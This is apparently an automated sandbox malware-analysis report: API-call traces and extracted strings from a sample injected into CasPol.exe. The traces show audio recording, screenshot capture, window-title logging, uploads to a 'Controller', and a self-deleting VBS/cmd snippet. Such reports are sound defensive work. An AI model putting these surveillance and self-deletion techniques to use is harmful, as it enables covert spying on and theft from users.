• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
• SetEvent.KERNEL32 ref: 0041A38A
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
• CloseHandle.KERNEL32 ref: 0041A3AB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
Strings
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
• WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
• WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
• WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
Strings
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
• GetProcAddress.KERNEL32(00000000), ref: 004064FD
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
• GetProcAddress.KERNEL32(00000000), ref: 00406539
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
• GetProcAddress.KERNEL32(00000000), ref: 0040654D
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
Strings
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Strings
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1D6
• _memcmp.LIBVCRUNTIME ref: 0041B1EE
• lstrlenW.KERNEL32(?), ref: 0041B207
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
• lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
• _wcslen.LIBCMT ref: 0041B2DB
• FindVolumeClose.KERNEL32(?), ref: 0041B2FB
• GetLastError.KERNEL32 ref: 0041B313
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
• lstrcatW.KERNEL32(?,?), ref: 0041B359
• lstrcpyW.KERNEL32(?,?), ref: 0041B368
• GetLastError.KERNEL32 ref: 0041B370
Strings
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
APIs
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
• Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
• Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
• Sleep.KERNEL32(00000064), ref: 00412060
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$HDG$HDG$>G$>G
• API String ID: 1223786279-3931108886
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• FreeLibrary.KERNEL32(00000000), ref: 00413EEF
• LoadLibraryA.KERNEL32(?), ref: 00413F27
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
• FreeLibrary.KERNEL32(00000000), ref: 00413F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
• FreeLibrary.KERNEL32(00000000), ref: 00413F66
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
• RegCloseKey.ADVAPI32(?), ref: 0041BB54
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
• GetCursorPos.USER32(?), ref: 0041CAF8
• SetForegroundWindow.USER32(?), ref: 0041CB01
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
• Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
• ExitProcess.KERNEL32 ref: 0041CB74
• CreatePopupMenu.USER32 ref: 0041CB7A
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
APIs
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
• __aulldiv.LIBCMT ref: 00407FE9
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
• CloseHandle.KERNEL32(00000000), ref: 00408200
• CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
• CloseHandle.KERNEL32(00000000), ref: 00408256
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
• API String ID: 1884690901-3066803209
APIs
• Sleep.KERNEL32(00001388), ref: 00409E62
  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
• GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID: @CG$@CG$XCG$XCG$xAG$xAG
• API String ID: 3795512280-3163867910
APIs
• ___free_lconv_mon.LIBCMT ref: 004500B1
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
• _free.LIBCMT ref: 004500A6
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 004500C8
• _free.LIBCMT ref: 004500DD
• _free.LIBCMT ref: 004500E8
• _free.LIBCMT ref: 0045010A
• _free.LIBCMT ref: 0045011D
• _free.LIBCMT ref: 0045012B
• _free.LIBCMT ref: 00450136
• _free.LIBCMT ref: 0045016E
• _free.LIBCMT ref: 00450175
• _free.LIBCMT ref: 00450192
• _free.LIBCMT ref: 004501AA
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                            • API String ID: 489098229-65789007
                                                                                                            • Opcode ID: e5b4c5c08f955cc3e65d7152bc7056668d80937632c53f076a10592495d31ca6
                                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                            • Opcode Fuzzy Hash: e5b4c5c08f955cc3e65d7152bc7056668d80937632c53f076a10592495d31ca6
                                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                            • API String ID: 1913171305-390638927
                                                                                                            • Opcode ID: 222c1658ba95736b802eee0df1c967450302ea47f021d80fb4b35919c33a7236
                                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                            • Opcode Fuzzy Hash: 222c1658ba95736b802eee0df1c967450302ea47f021d80fb4b35919c33a7236
                                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                            • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                                            • API String ID: 911427763-3954389425
                                                                                                            • Opcode ID: 857cb8547fc0c7de63d47fafe1f939e9c3f12b23128d66a6f39a65a77907db43
                                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                            • Opcode Fuzzy Hash: 857cb8547fc0c7de63d47fafe1f939e9c3f12b23128d66a6f39a65a77907db43
                                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 65535$udp
                                                                                                            • API String ID: 0-1267037602
                                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                                            • _free.LIBCMT ref: 00439471
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2441525078-0
                                                                                                            • Opcode ID: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                            • Opcode Fuzzy Hash: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                            • API String ID: 2956720200-749203953
                                                                                                            • Opcode ID: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                            • Opcode Fuzzy Hash: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                            • Opcode ID: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                            • Opcode Fuzzy Hash: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
